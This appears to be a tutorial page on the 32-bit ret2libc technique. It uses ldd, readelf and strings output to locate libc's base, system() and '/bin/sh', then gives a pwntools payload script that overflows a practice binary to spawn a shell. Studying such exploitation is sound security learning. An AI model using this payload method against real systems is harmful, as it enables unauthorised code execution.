Skip to content

ret2libc - 32-bit Exploit

A ret2libc is based off the system function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.

Getting Libc and its base

> ldd smail (0xf7fd2000) => /lib32/ (0xf7dc2000)
    /lib/ (0xf7fd3000)
We need, so the base address of libc is 0xf7dc2000

Getting the location of system()

To call system, we obviously need its location in memory. We can use the readelf command for this.

> readelf -s /lib32/ | grep system
  1534: 00044f00    55 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.0
The -s flag tells readelf to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00

Getting the location of /bin/sh

Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.

> strings -a -t x /lib32/ | grep /bin/sh
   18c32b /bin/sh
-a tells it to scan the entire file; -t x tells it to output the offset in hex.


from pwn import *

p = process('./smail')

libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh